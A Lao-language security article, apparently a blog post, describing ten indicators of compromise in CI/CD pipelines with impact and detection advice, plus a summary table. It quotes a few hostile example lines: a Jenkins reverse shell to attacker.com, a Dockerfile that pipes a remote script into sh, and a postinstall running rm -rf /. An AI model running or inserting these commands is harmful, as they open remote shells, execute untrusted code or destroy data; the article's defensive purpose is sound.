10 ຕົວຊີ້ວັດອັນດັບຕົ້ນໆຂອງການປະນີປະນອມໃນ CI/CD Pipelines

ບົດນຳ: ຕົວຊີ້ວັດຂອງການປະນີປະນອມໃນຄວາມປອດໄພທາງໄຊເບີແມ່ນຫຍັງ?

ຕົວຊີ້ບອກຂອງການປະນີປະນອມແມ່ນສັນຍານເຕືອນໄພທຳອິດທີ່ສະແດງໃຫ້ເຫັນວ່າລະບົບຂອງທ່ານ ຫຼື pipeline ອາດຈະຢູ່ພາຍໃຕ້ການໂຈມຕີ. ເວົ້າງ່າຍໆ, ຕົວຊີ້ວັດຂອງການປະນີປະນອມ ແມ່ນຮ່ອງຮອຍທີ່ຜູ້ໂຈມຕີປະໄວ້, ຄືກັບເລື່ອງແປກໆ logins, ການປ່ຽນແປງໄຟລ໌, ຫຼື ມັນແວທີ່ເຊື່ອງໄວ້. ໃນ ຄວາມປອດໄພທາງໄຊເບີຂອງ IOC, ພວກມັນເຮັດໜ້າທີ່ຄືກັບລາຍນິ້ວມືຢູ່ບ່ອນເກີດເຫດ, ເຊິ່ງໃຫ້ຫຼັກຖານທີ່ຊັດເຈນວ່າມີບາງຢ່າງຜິດປົກກະຕິ. ດັ່ງນັ້ນ, ເມື່ອນັກພັດທະນາຖາມ ຕົວຊີ້ວັດຂອງການປະນີປະນອມແມ່ນຫຍັງ, ຄຳຕອບບໍ່ໄດ້ຈຳກັດພຽງແຕ່ເຊີບເວີ ຫຼື ໄຟວໍ, ມັນຍັງລວມເຖິງຄວາມສ່ຽງທີ່ເຊື່ອງໄວ້ໃນຍຸກສະໄໝໃໝ່ CI/CD pipelines.

ໃນເຫຼົ່ານີ້ pipelines, ຜູ້ໂຈມຕີສາມາດດັດແປງລະຫັດ, ສົ່ງ dependencies ທີ່ເປັນອັນຕະລາຍ, ຫຼືປ່ຽນແປງຂັ້ນຕອນການສ້າງໂດຍທີ່ບໍ່ມີໃຜສັງເກດເຫັນ. ຢ່າງໃດກໍຕາມ, ຄູ່ມືສ່ວນໃຫຍ່ຍັງສຸມໃສ່ພຽງແຕ່ເຊີບເວີ ຫຼື ເຄືອຂ່າຍເທົ່ານັ້ນ. ດັ່ງນັ້ນ, ລະບົບຕ່ອງໂສ້ການສະໜອງຊອບແວໄດ້ກາຍເປັນໜຶ່ງໃນເປົ້າໝາຍທີ່ງ່າຍທີ່ສຸດ.

ນັ້ນແມ່ນເຫດຜົນທີ່ວ່າການຊອກຫາຕົວຊີ້ບອກຂອງການປະນີປະນອມໃນ CI/CD pipelines ແມ່ນສິ່ງຈຳເປັນ. ເໜືອສິ່ງອື່ນໃດ, ມັນຊ່ວຍໃຫ້ທີມງານສະກັດກັ້ນມັນແວ, ປົກປ້ອງຄວາມລັບ ແລະ ຮັບປະກັນທຸກຂັ້ນຕອນຂອງການຈັດສົ່ງຊອບແວ.

10 ຕົວຊີ້ວັດອັນດັບຕົ້ນໆຂອງການປະນີປະນອມໃນ CI/CD Pipelines

ເມື່ອອະທິບາຍເຖິງຕົວຊີ້ບອກຂອງການປະນີປະນອມ, ລາຍຊື່ສ່ວນໃຫຍ່ແມ່ນສຸມໃສ່ເຊີບເວີ ຫຼື ເຄືອຂ່າຍ. ເຖິງຢ່າງໃດກໍ່ຕາມ, ໃນ CI/CD pipelines, ຜູ້ໂຈມຕີປະໄວ້ລາຍນິ້ວມືທີ່ແຕກຕ່າງກັນຫຼາຍ. ການຮັບຮູ້ສັນຍານເຫຼົ່ານີ້ແມ່ນມີຄວາມສໍາຄັນຫຼາຍສໍາລັບການປ້ອງກັນຢ່າງຕັ້ງໜ້າ. ຂ້າງລຸ່ມນີ້ແມ່ນ 10 ສັນຍານເຕືອນໄພຄວາມປອດໄພທາງໄຊເບີຂອງ IOC ທີ່ນັກພັດທະນາ ແລະ ວິສະວະກອນຄວາມປອດໄພທຸກຄົນຄວນລະວັງ.

1. ການປ່ຽນແປງການເພິ່ງພາອາໄສທີ່ໜ້າສົງໄສ

ໜຶ່ງໃນຕົວຊີ້ວັດຫຼັກຂອງການປະນີປະນອມໃນ pipelines ເປັນການອັບເດດການເພິ່ງພາອາໄສທີ່ກະທັນຫັນ ແລະ ແປກປະຫຼາດ. ຜູ້ໂຈມຕີມັກໃຊ້ຄວາມໄວ້ວາງໃຈທີ່ນັກພັດທະນາວາງໄວ້ໃນຕົວຈັດການແພັກເກດເພື່ອເພີ່ມແພັກເກດທີ່ເປັນອັນຕະລາຍ.

ຕົວຢ່າງ, ໃນ npm a package.json diff ອາດຈະປະກອບມີ:

ການປ່ຽນແປງດັ່ງກ່າວອາດເບິ່ງຄືວ່າປອດໄພແຕ່ສາມາດສັກລະຫັດທີ່ຖືກກວດພົບວ່າເປັນໂຣກໂທຣຈັນເຂົ້າໄປໃນທຸກໆ build.

ຜົນກະທົບ: ການສ້າງທີ່ຖືກລະເມີດຈະສືບທອດມັນແວທີ່ຕົ້ນກຳເນີດ.

ການຊອກຄົ້ນຫາ: ບັງຄັບໃຊ້ການທົບທວນການເພິ່ງພາອາໄສ, ຕິດຕາມຄວາມແຕກຕ່າງຂອງໄຟລ໌ລັອກ, ແລະສະແກນແພັກເກດໃໝ່ຕະຫຼອດເວລາ.

2. ລະຫັດທີ່ສັບສົນໃນ Builds 

ຜູ້ຂຽນມັລແວຣ໌ອາໄສການປິດບັງເພື່ອຫຼີກລ່ຽງການທົບທວນຄືນ. ດັ່ງນັ້ນ, ຕົວຊີ້ວັດນີ້ຂອງການປະນີປະນອມໃນ CI/CD pipelines ສາມາດເປັນໜຶ່ງໃນສິ່ງທີ່ຈັບໄດ້ຍາກທີ່ສຸດ. ໃນຄວາມເປັນຈິງ, payload ທີ່ຖືກປິດບັງມັກຈະເລື່ອນເຂົ້າໄປໃນຫ້ອງສະໝຸດແຫຼ່ງເປີດ ຫຼື ຮູບພາບ container ໂດຍບໍ່ໄດ້ແຈ້ງໃຫ້ຊາບລ່ວງໜ້າ.

ຍົກ​ຕົວ​ຢ່າງ:

  • ຊຸດ PyPI ໂດຍໃຊ້ base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • ຮູບພາບ Docker ທີ່ເຕັມໄປດ້ວຍໄບນາຣີ UPX ທີ່ບໍ່ຈຳເປັນ.
  • JavaScript ເຕັມໄປດ້ວຍ \x41\x42 ຫຼົບໜີຈາກຜູ້ລັກຂໍ້ມູນປະຈຳຕົວ.

ຜົນກະທົບ: ລະຫັດທີ່ເຊື່ອງໄວ້ຈະປະຕິບັດຢ່າງງຽບໆໃນລະຫວ່າງການສ້າງ ຫຼື ເວລາແລ່ນ, ເຊິ່ງເຮັດໃຫ້ສິ່ງນີ້ເປັນສັນຍານທີ່ສຳຄັນໃນຄວາມປອດໄພທາງໄຊເບີຂອງ IOC.
ການຊອກຄົ້ນຫາ: ສົມທົບ SAST ດ້ວຍການສະແກນມັລແວຣ໌ເພື່ອໝາຍລະຫັດທີ່ຖືກເຂົ້າລະຫັດ ຫຼື ລະຫັດທີ່ຖືກຫຸ້ມຫໍ່. ເໜືອສິ່ງອື່ນໃດ, ໃຫ້ຖືວ່າການປິດບັງຂໍ້ມູນເປັນສັນຍານເຕືອນໄພທີ່ສົມຄວນໄດ້ຮັບການສືບສວນຕື່ມອີກ.

3. ຄວາມລັບທີ່ຖືກເປີດເຜີຍໃນ Git: ຄວາມສ່ຽງດ້ານຄວາມປອດໄພທາງໄຊເບີຂອງ IOC ແບບຄລາສສິກ

CI/CD pipelineມັກຈະສືບທອດຄວາມລັບໂດຍກົງຈາກບ່ອນເກັບມ້ຽນ. ຢ່າງໃດກໍຕາມ, ເມື່ອຄວາມລັບປາກົດຢູ່ໃນ Git, ພວກມັນກາຍເປັນໜຶ່ງໃນຄຳຕອບທີ່ຊັດເຈນທີ່ສຸດຕໍ່ຄຳຖາມທີ່ວ່າ "ຕົວຊີ້ວັດຂອງການປະນີປະນອມແມ່ນຫຍັງ pipeline"ເມື່ອຂໍ້ມູນປະຈຳຕົວລົງໃນ Git, ຜູ້ໂຈມຕີສາມາດນຳໃຊ້ປະໂຫຍດຈາກຂໍ້ມູນເຫຼົ່ານັ້ນໄດ້ຢ່າງບໍ່ມີກຳນົດ."

ຍົກ​ຕົວ​ຢ່າງ:

  • A .env ໄຟລ໌ທີ່ປະກອບດ້ວຍ AWS_SECRET_KEY=.
  • ໂທເຄັນຖືກຍູ້ເຂົ້າມາ config.json.
  • ຄວາມລັບຍັງຄົງເບິ່ງເຫັນໄດ້ໃນປະຫວັດ Git ເຖິງແມ່ນວ່າຈະຖືກລຶບອອກແລ້ວກໍຕາມ.

ຜົນກະທົບ: ກະແຈທີ່ເປີດເຜີຍຊ່ວຍໃຫ້ຜູ້ໂຈມຕີສາມາດເຂົ້າເຖິງໄດ້ໂດຍກົງ CI/CD pipelines, ລະບົບຄລາວ, ຫຼືຖານຂໍ້ມູນ. ດັ່ງນັ້ນ, ນີ້ແມ່ນໜຶ່ງໃນຕົວຊີ້ບອກທີ່ອັນຕະລາຍທີ່ສຸດຂອງການປະນີປະນອມ.
ການຊອກຄົ້ນຫາ: ການນໍາໃຊ້ pre-commit hooks ແລະວຽກ CI ສຳລັບການສະແກນລັບ, ແລະຍົກເລີກກະແຈທີ່ຮົ່ວໄຫຼທັນທີ. ນອກຈາກນັ້ນ, ໃຫ້ບັງຄັບໃຊ້ການແກ້ໄຂອັດຕະໂນມັດເພື່ອຫຼຸດຜ່ອນໄລຍະເວລາການເປີດເຜີຍ.

4. ຖືກແຝງ Pipeline ການຕັ້ງຄ່າ: ຕົວຊີ້ບອກທີ່ເຊື່ອງໄວ້ຂອງການປະນີປະນອມ

Pipeline configs ແມ່ນເປົ້າໝາຍທີ່ມີມູນຄ່າສູງເພາະວ່າ ການດັດແປງພຽງຄັ້ງດຽວມັກຈະເຮັດໃຫ້ຂະບວນການເຮັດວຽກທັງໝົດເສຍຫາຍ. ດັ່ງນັ້ນ, ຈຶ່ງຖືກດັດແປງ pipeline ໄຟລ໌ຕ່າງໆແມ່ນຄວາມສ່ຽງດ້ານຄວາມປອດໄພທາງໄຊເບີທີ່ສຳຄັນຂອງ IOC ທີ່ເຄື່ອງມືຕິດຕາມກວດກາແບບດັ້ງເດີມບໍ່ຄ່ອຍກວດພົບ.

ຍົກ​ຕົວ​ຢ່າງ:

  • ການກະທຳໃນ GitHub:

  • ໃນ GitLab: ມີວຽກທີ່ເປັນອັນຕະລາຍຖືກເພີ່ມເຂົ້າໃນ .gitlab-ci.yml ທີ່ຖິ້ມຂໍ້ມູນທີ່ລະອຽດອ່ອນ.
  • ໃນ Jenkins: sh "nc -e /bin/bash attacker.com 4444".

ຜົນກະທົບ: ການປ່ຽນແປງທີ່ບໍ່ໄດ້ຮັບການອະນຸມັດເຫຼົ່ານີ້ຈະປ່ຽນທ່ານ pipeline ເຂົ້າໄປໃນປະຕູຫລັງຖາວອນສຳລັບຜູ້ໂຈມຕີ, ເຊິ່ງນັບເປັນຕົວຊີ້ບອກຢ່າງຈະແຈ້ງວ່າການປະນີປະນອມ.
ການຊອກຄົ້ນຫາ: ບັງຄັບໃຊ້ການຕັ້ງຄ່າທີ່ໄດ້ເຊັນແລ້ວ, ຮຽກຮ້ອງໃຫ້ມີການອະນຸມັດ PR, ແລະ ຕິດຕາມກວດກາວຽກທີ່ບໍ່ຄາດຄິດ. ນອກຈາກນັ້ນ, ຕັ້ງຄ່າ guardrails ທີ່ບລັອກຂະບວນການເຮັດວຽກທີ່ຖືກປ່ຽນແປງໂດຍອັດຕະໂນມັດ.

5. ສິດທິພິເສດ IaC ຄ່າເລີ່ມຕົ້ນ 

ນິຍາມໂຄງສ້າງພື້ນຖານທີ່ຖືກຕັ້ງຄ່າບໍ່ຖືກຕ້ອງມັກຈະສ້າງປະຕູຫຼັງທີ່ເຊື່ອງໄວ້. ດັ່ງນັ້ນ, ຄ່າເລີ່ມຕົ້ນທີ່ມີສິດທິພິເສດໃນ IaC ແມ່ນຄວາມສ່ຽງດ້ານຄວາມປອດໄພທາງໄຊເບີຂອງ IOC ແບບຄລາສສິກ.

ຍົກ​ຕົວ​ຢ່າງ:

  • pods ການອະນຸຍາດການນຳໃຊ້ Kubernetes privileged: true.
  • ຕາຕະລາງ Helm ເປີດເຜີຍການບໍລິການດ້ວຍ 0.0.0.0:22.

ຜົນກະທົບ: ຜູ້ໂຈມຕີໄດ້ຮັບການເຂົ້າເຖິງລະດັບຮາກຖານ ຫຼື ເປີດເຜີຍການບໍລິການພາຍໃນຕໍ່ສາທາລະນະ. ດັ່ງນັ້ນ, ບັນຫາເຫຼົ່ານີ້ຈຶ່ງຂະຫຍາຍພື້ນທີ່ການໂຈມຕີຢ່າງຫຼວງຫຼາຍ.
ການຊອກຄົ້ນຫາ: ສະຫມັກຂໍເອົາ IaC ການສະແກນເພື່ອບັງຄັບໃຊ້ສິດທິພິເສດໜ້ອຍທີ່ສຸດກ່ອນການລວມເຂົ້າກັນ. ນອກຈາກນັ້ນ, ໃຫ້ແນ່ໃຈວ່າການຕັ້ງຄ່າທຸກຢ່າງຖືກທົບທວນຄືນເປັນສ່ວນໜຶ່ງຂອງ pipeline.

6. ພຶດຕິກຳການກໍ່ສ້າງທີ່ຜິດປົກກະຕິ 

ຜູ້ໂຈມຕີມັກຈະປ່ຽນແປງ pipeline ພຶດຕິກຳທີ່ຈະເລື່ອນການກະທຳທີ່ເປັນອັນຕະລາຍ. ເວົ້າອີກຢ່າງໜຶ່ງ, ກິດຈະກຳການກໍ່ສ້າງທີ່ຜິດປົກກະຕິແມ່ນໜຶ່ງໃນຄຳຕອບທີ່ຊັດເຈນທີ່ສຸດຕໍ່ສິ່ງທີ່ເປັນຕົວຊີ້ບອກຂອງການປະນີປະນອມໃນ CI/CD pipelines.

ຍົກ​ຕົວ​ຢ່າງ:

  • Builds ກຳລັງສ້າງການຮ້ອງຂໍເຄືອຂ່າຍອອກໄປຫາໂດເມນແປກໆ.
  • ໂຄງການ Node.js ເຮັດໃຫ້ເກີດ PowerShell ຢ່າງກະທັນຫັນໃນລະຫວ່າງ npm install.
  • ວຽກ CI ກຳລັງດາວໂຫຼດໄຟລ໌ໄບນາຣີຂະໜາດໃຫຍ່ທີ່ບໍ່ໄດ້ກຳນົດໄວ້ໃນສະຄຣິບສ້າງ.

ຜົນກະທົບ: ການສ້າງທີ່ຖືກໂຈມຕີສາມາດເຮັດໜ້າທີ່ເປັນຈຸດແຈກຢາຍມັລແວຣ໌ໄດ້. ເໜືອສິ່ງອື່ນໃດ, ພວກມັນແຜ່ກະຈາຍຂໍ້ມູນອັນຕະລາຍໄປທົ່ວທຸກໆການນຳໃຊ້.
ການຊອກຄົ້ນຫາ: ຕິດຕາມບັນທຶກການສ້າງສຳລັບຂະບວນການ ຫຼື ການເຊື່ອມຕໍ່ທີ່ບໍ່ຄາດຄິດ. ນອກຈາກນັ້ນ, ຕັ້ງຄ່າການກວດຫາຄວາມຜິດປົກກະຕິເພື່ອໝາຍພຶດຕິກຳທີ່ຢູ່ນອກເໜືອຈາກມາດຕະຖານ.

7. ສະຄຣິບແພັກເກດທີ່ເປັນອັນຕະລາຍເປັນຄວາມສ່ຽງດ້ານຄວາມປອດໄພທາງໄຊເບີຂອງ IOC

ຜູ້ຈັດການແພັກເກດສະໜັບສະໜູນວົງຈອນຊີວິດ hooks ທີ່ຜູ້ໂຈມຕີໃຊ້ປະໂຫຍດຈາກ. ດັ່ງນັ້ນ, ສະຄຣິບທີ່ເປັນອັນຕະລາຍໃນ npm, PyPI, ຫຼື Dockerfiles ແມ່ນຕົວຊີ້ບອກທີ່ເຂັ້ມແຂງຂອງການປະນີປະນອມ.

ຍົກ​ຕົວ​ຢ່າງ:

  • npm: postinstall ການແລ່ນສະຄຣິບ rm -rf / ຫຼືສັນຍານໄປຫາ C2.
  • PyPI: setup.py ການປະຕິບັດລະຫັດ Python ທີ່ເຊື່ອງໄວ້ໃນເວລາຕິດຕັ້ງ.
  • Dockerfile: RUN curl attacker.sh | sh.

ຜົນກະທົບ: ການໂຈມຕີຈະເກີດຂຶ້ນໃນລະຫວ່າງການຕິດຕັ້ງ, ກ່ອນການທົດສອບເວລາເຮັດວຽກໃດໆ. ດັ່ງນັ້ນ, ນັກພັດທະນາອາດຈະບໍ່ສັງເກດເຫັນຈົນກວ່າມັນຈະສາຍເກີນໄປ.
ການຊອກຄົ້ນຫາ: ສະແກນລາຍການໂປຣແກຣມຂອງແພັກເກດສຳລັບສະຄຣິບຕິດຕັ້ງ. ນອກຈາກນັ້ນ, ຈຳກັດຄວາມສ່ຽງ hooks in CI/CD ວຽກເພື່ອຫຼຸດຜ່ອນການສຳຜັດ.

8. ຕົວຊີ້ບອກການເປັນພິດຂອງທະບຽນຂອງການປະນີປະນອມ

ຜູ້ໂຈມຕີປ່ຽນແທນ ຫຼື ດັດແປງສິ່ງປະດິດໃນການລົງທະບຽນ, ແລະ ເຫດການເຫຼົ່ານີ້ແມ່ນຕົວຢ່າງຂອງຕົວຊີ້ບອກເຖິງການປະນີປະນອມໃນລະບົບຕ່ອງໂສ້ການສະໜອງ. pipelines.

ຍົກ​ຕົວ​ຢ່າງ:

  • ແທັກຮູບພາບ Docker ໄດ້ອັບເດດຢ່າງງຽບໆດ້ວຍຊັ້ນທີ່ຖືກກວດພົບວ່າເປັນໂຣກໂທຣຈັນ.
  • ຊຸດພາຍໃນໄດ້ຖືກປ່ຽນແທນດ້ວຍລຸ້ນທີ່ເປັນພິດ.
  • ການຫຍໍ້ລົງຂອງ namespace npm ເຊັ່ນ: lodash-proxy.

ຜົນກະທົບ: ທຸກໆການສ້າງທີ່ໃຊ້ສິ່ງປະດິດຂອງ registry ຈະຖືກໂຈມຕີ. ບໍ່ພຽງແຕ່ເທົ່ານັ້ນ, ແຕ່ການຂົ່ມຂູ່ຍັງແຜ່ລາມໄປສູ່ການບໍລິການຊັ້ນລຸ່ມ.
ການຊອກຄົ້ນຫາ: ບັງຄັບໃຊ້ການກວດສອບລາຍເຊັນ ແລະ ຄວາມສົມບູນໃນການດຶງຂໍ້ມູນຈາກລີຈິສຕຣີທັງໝົດ. ນອກຈາກນັ້ນ, ຕິດຕາມຕົ້ນກຳເນີດຂອງສິ່ງປະດິດດ້ວຍ SBOM ການກວດສອບ.

9. ກິດຈະກຳຂອງຜູ້ໃຊ້ທີ່ຜິດປົກກະຕິເປັນຫຼັກຖານຂອງ IOC

ບັນຊີທີ່ຖືກໂຈມຕີເກືອບຈະປະໄວ້ຮ່ອງຮອຍທີ່ຜິດປົກກະຕິຢູ່ເບື້ອງຫຼັງ. ດັ່ງນັ້ນ, ພຶດຕິກຳທີ່ຜິດປົກກະຕິຂອງນັກພັດທະນາຈຶ່ງເປັນຕົວຊີ້ບອກທີ່ເຂັ້ມແຂງຂອງການປະນີປະນອມ.

ຍົກ​ຕົວ​ຢ່າງ:

  • Commits ຖືກຍູ້ໃນເວລາ 3 ໂມງເຊົ້າຕາມເວລາທ້ອງຖິ່ນ.
  • ການອະນຸມັດ PR ໂດຍບັນຊີໃນຊ່ວງວັນພັກ.
  • Pipelines ຖືກກະຕຸ້ນດ້ວຍຄວາມຖີ່ຜິດປົກກະຕິ.

ຜົນກະທົບ: ຜູ້ໂຈມຕີໃຊ້ຂໍ້ມູນປະຈຳຕົວທີ່ຖືກລັກໄປໃນທາງທີ່ຜິດເພື່ອໃສ່ການປ່ຽນແປງທີ່ເປັນອັນຕະລາຍ. ຫຼັງຈາກທີ່ທັງໝົດ, ບໍ່ໄດ້ຮັບອະນຸຍາດ commits ປະສົມປະສານເຂົ້າກັບຂະບວນການເຮັດວຽກປົກກະຕິໄດ້ຢ່າງງ່າຍດາຍ.
ການຊອກຄົ້ນຫາ: ຕິດຕາມກວດກາ SCM ກິດຈະກຳສຳລັບຄວາມຜິດປົກກະຕິ, ບັງຄັບໃຊ້ MFA, ແລະ ໝູນວຽນໂທເຄັນເປັນປະຈຳ. ນອກຈາກນັ້ນ, ໃຫ້ແຈ້ງເຕືອນກ່ຽວກັບສິ່ງທີ່ໜ້າສົງໄສ commit ຫຼືຮູບແບບການອະນຸມັດ.

10. ການກວດສອບຄວາມຊື່ສັດ ຫຼື ລາຍເຊັນທີ່ລົ້ມເຫຼວໃນຄວາມປອດໄພທາງໄຊເບີຂອງ IOC

ເປັນເລື່ອງທຳມະດາແຕ່ຖືກລະເລີຍ ຕົວຊີ້ວັດຂອງການປະນີປະນອມ ແມ່ນການກວດສອບຄວາມສົມບູນ ຫຼື ລາຍເຊັນທີ່ລົ້ມເຫຼວ. ໃນຄວາມປອດໄພທາງໄຊເບີຂອງ IOC, ການກວດສອບເຫຼົ່ານີ້ຢືນຢັນວ່າລະຫັດ ຫຼື ສິ່ງປະດິດແມ່ນຖືກຕ້ອງ. ການຂ້າມພວກມັນຈະເຮັດໃຫ້ເກີດບັນຫາ pipelines ເປີດ​ເຜີຍ.

ຕົວຢ່າງ:

  • ແຮຊ SHA256 ບໍ່ກົງກັບ checksum ທີ່ຄາດໄວ້.
  • ລາຍເຊັນ GPG ທີ່ຂາດຫາຍໄປ ຫຼື ບໍ່ຖືກຕ້ອງ.
  • An SBOM ສະແດງສິ່ງປະດິດທີ່ບໍ່ໄດ້ເຊັນ.

ຜົນກະທົບ: ຄວາມລົ້ມເຫຼວຂອງຄວາມຊື່ສັດມັກຈະໝາຍເຖິງການແຊກແຊງ, ການເປັນພິດຈາກການລົງທະບຽນ, ຫຼື ການສັກຢາມັລແວ.

ການຊອກຄົ້ນຫາ: ກວດສອບລາຍເຊັນໂດຍອັດຕະໂນມັດ, ບັງຄັບໃຊ້ການກວດສອບຄວາມຖືກຕ້ອງຂອງ checksum, ແລະບລັອກອົງປະກອບທີ່ບໍ່ໄດ້ເຊັນ. ເໜືອສິ່ງອື່ນໃດ, ໃຫ້ຖືວ່າການກວດສອບທີ່ລົ້ມເຫຼວທຸກຢ່າງເປັນຫຼັກຖານທີ່ຊັດເຈນຂອງການປະນີປະນອມ.

CI/CD ຕົວຊີ້ວັດຂອງການປະນີປະນອມໂດຍຫຍໍ້

ຕົວຊີ້ວັດການປະນີປະນອມ (IOC) ຜົນກະທົບໃນ CI/CD Pipelines ວິທີການກວດພົບ
ການປ່ຽນແປງການເພິ່ງພາອາໄສທີ່ໜ້າສົງໄສ ຜູ້ໂຈມຕີໄດ້ສັກຫ້ອງສະໝຸດທີ່ເປັນອັນຕະລາຍເຂົ້າໄປໃນຕົວຈັດການແພັກເກດ, ເຊິ່ງນຳໄປສູ່ການສ້າງບລັອກທີ່ຖືກໂຈມຕີ. ຕິດຕາມຄວາມແຕກຕ່າງຂອງໄຟລ໌ລັອກ, ບັງຄັບໃຊ້ການທົບທວນການເພິ່ງພາອາໄສ, ແລະສະແກນການເພິ່ງພາອາໄສຢ່າງຕໍ່ເນື່ອງ.
ລະຫັດທີ່ສັບສົນໃນ Builds payloads ທີ່ເຊື່ອງໄວ້ຈະປະຕິບັດໃນລະຫວ່າງການສ້າງ ຫຼື ເວລາແລ່ນໂດຍບໍ່ມີການກວດພົບ. ການນໍາໃຊ້ SAST ແລະ ການສະແກນມັນແວເພື່ອສະແດງຮູບແບບລະຫັດ base64, hex, ຫຼື packed.
ຄວາມລັບທີ່ຖືກເປີດເຜີຍໃນ Git ໂທເຄັນ ຫຼື ລະຫັດ API ທີ່ຮົ່ວໄຫຼໃຫ້ຜູ້ໂຈມຕີເຂົ້າເຖິງລະບົບທີ່ສຳຄັນໄດ້ໂດຍກົງ. ດໍາເນີນການສະແກນລັບໃນ Git hooks ແລະ ຍົກເລີກຂໍ້ມູນປະຈຳຕົວທີ່ຮົ່ວໄຫຼໂດຍອັດຕະໂນມັດ.
ຖືກແຝງ Pipeline Configurations ຂັ້ນຕອນການເຮັດວຽກທີ່ໄດ້ຮັບການດັດແປງອະນຸຍາດໃຫ້ມີການກັ່ນຕອງຂໍ້ມູນ ຫຼື ການຄົງຢູ່ພາຍໃນ CI/CD. ຮຽກຮ້ອງໃຫ້ມີການອະນຸມັດ PR, ບັງຄັບໃຊ້ການຕັ້ງຄ່າທີ່ໄດ້ລົງນາມແລ້ວ, ແລະ ຕິດຕາມກວດກາ pipeline ປ່ຽນແປງ.
ສິດທິພິເສດ IaC ຄ່າເລີ່ມຕົ້ນ ພາລະບົດບາດທີ່ອະນຸຍາດຫຼາຍເກີນໄປ ຫຼື ຄ່າເລີ່ມຕົ້ນທີ່ບໍ່ປອດໄພຈະເປີດເຜີຍສະພາບແວດລ້ອມຄລາວ. ສະແກນໄຟລ໌ Terraform, Kubernetes, ແລະ Helm ສຳລັບການບັງຄັບໃຊ້ສິດທິພິເສດໜ້ອຍທີ່ສຸດ.
ພຶດຕິກຳການສ້າງທີ່ຜິດປົກກະຕິ Pipelineໃຊ້ເປັນຈຸດແຈກຢາຍມັນແວ ຫຼື ສຳລັບການເຄື່ອນໄຫວທາງຂ້າງ. ວິເຄາະບັນທຶກການສ້າງສຳລັບການດາວໂຫຼດ, ຂະບວນການ ຫຼື ການໂທອອກທີ່ບໍ່ຄາດຄິດ.
ສະຄຣິບແພັກເກດທີ່ເປັນອັນຕະລາຍ ສະຄຣິບກ່ອນ/ຫຼັງການຕິດຕັ້ງທີ່ເຊື່ອງໄວ້ຈະກະຕຸ້ນ payloads ກ່ອນການທົດສອບ runtime. ບລັອກສະຄຣິບ npm/PyPI ທີ່ມີຄວາມສ່ຽງ ແລະ ຈຳກັດການປະຕິບັດໃນ CI/CD ວຽກ.
ການເປັນພິດຈາກການລົງທະບຽນ ສິ່ງປະດິດທີ່ຖືກ Trojanized ປ່ຽນແທນຮູບພາບທີ່ເຊື່ອຖືໄດ້ ຫຼື ໄບນາຣີໃນ registry. ກວດສອບ checksums, ບັງຄັບໃຊ້ການກວດສອບລາຍເຊັນ, ແລະສະແກນລີຈິສຕຣີຢ່າງມີປະສິດທິພາບ.
ກິດຈະກຳຂອງຜູ້ໃຊ້ທີ່ຜິດປົກກະຕິ ບັນຊີທີ່ຖືກບຸກລຸກສົ່ງຜົນກະທົບທາງລົບ commits ຫຼື ຕົວກະຕຸ້ນ pipelines. ບັງຄັບໃຊ້ MFA, ຕິດຕາມກວດກາ commitສຳລັບຄວາມຜິດປົກກະຕິ, ແລະວິເຄາະ login ຮູບແບບ.
ການກວດສອບຄວາມຊື່ສັດ ຫຼື ລາຍເຊັນລົ້ມເຫຼວ ຊີ້ບອກລະຫັດ, ການເພິ່ງພາອາໄສ ຫຼື ຮູບພາບທີ່ຖືກດັດແປງ pipeline. ກວດສອບຄວາມສົມບູນໂດຍອັດຕະໂນມັດ ແລະ ບລັອກອົງປະກອບທີ່ບໍ່ໄດ້ເຊັນ ຫຼື ບໍ່ກົງກັນ.

ເປັນຫຍັງຄວາມປອດໄພທາງໄຊເບີແບບດັ້ງເດີມຂອງ IOC ຈຶ່ງພາດ CI/CD ຄວາມສ່ຽງ

ອົງກອນສ່ວນໃຫຍ່ໄດ້ຕິດຕາມກວດກາຕົວຊີ້ວັດການປະນີປະນອມໃນເຊີບເວີ, ຄອມພິວເຕີ ຫຼື ເຄືອຂ່າຍແລ້ວ. ເຖິງຢ່າງໃດກໍ່ຕາມ, ວິທີການແບບຄລາສສິກນີ້ຕໍ່ກັບຄວາມປອດໄພທາງໄຊເບີຂອງ IOC ບໍ່ສົນໃຈ CI/CD pipelines, ເຊິ່ງປະຈຸບັນນີ້ແມ່ນໜຶ່ງໃນໜ້າການໂຈມຕີທີ່ສຳຄັນທີ່ສຸດ. ໃນຄວາມເປັນຈິງ, pipelineສະແດງສັນຍານປະນີປະນອມທີ່ເປັນເອກະລັກທີ່ເຄື່ອງມືແບບດັ້ງເດີມບໍ່ສາມາດກວດພົບໄດ້.

ຕົວຊີ້ວັດຂອງການປະນີປະນອມໃນຄວາມໝັ້ນຄົງແບບດັ້ງເດີມ

ໃນຄວາມປອດໄພທາງໄຊເບີຂອງ IOC ແບບທຳມະດາ, ຈຸດສຸມມັກຈະຢູ່ທີ່:

  • ຜິດປົກກະຕິ loginຫຼື ທີ່ຢູ່ IP ທີ່ຊີ້ບອກເຖິງຂໍ້ມູນປະຈຳຕົວທີ່ຖືກລັກ.
  • ແຮຊໄຟລ໌ ຫຼື ການປ່ຽນແປງໃນລີຈິດສະຕິກທີ່ໜ້າສົງໄສທີ່ເປີດເຜີຍມັລແວ.
  • ການຈະລາຈອນອອກທີ່ບໍ່ຄາດຄິດທີ່ຊີ້ບອກເຖິງການລັກລອບຂໍ້ມູນ.

ເຫຼົ່ານີ້ແມ່ນຕົວຊີ້ວັດທີ່ຮູ້ຈັກກັນດີທີ່ຕິດຕາມຢູ່ໃນ MITER ATT&CK framework, ເຊິ່ງສະແດງພຶດຕິກຳ ແລະ ຍຸດທະວິທີທີ່ຄ້າຍຄືນກັນທົ່ວໄປຂອງສັດຕູ. ສິ່ງເຫຼົ່ານີ້ແມ່ນສັນຍານທີ່ເປັນປະໂຫຍດ. ຢ່າງໃດກໍຕາມ, ພວກມັນໃຊ້ກັບລະບົບປະຕິບັດການ ຫຼື ເຄືອຂ່າຍຂອງບໍລິສັດເປັນສ່ວນໃຫຍ່. ດັ່ງນັ້ນ, ພວກມັນຈຶ່ງພາດການແຊກແຊງທີ່ລະອຽດອ່ອນທີ່ເກີດຂຶ້ນກ່ອນໜ້ານີ້ໃນລະບົບຕ່ອງໂສ້ການສະໜອງຊອບແວ.

ເປັນຫຍັງ CI/CD Pipelines ມີຄວາມແຕກຕ່າງກັນ

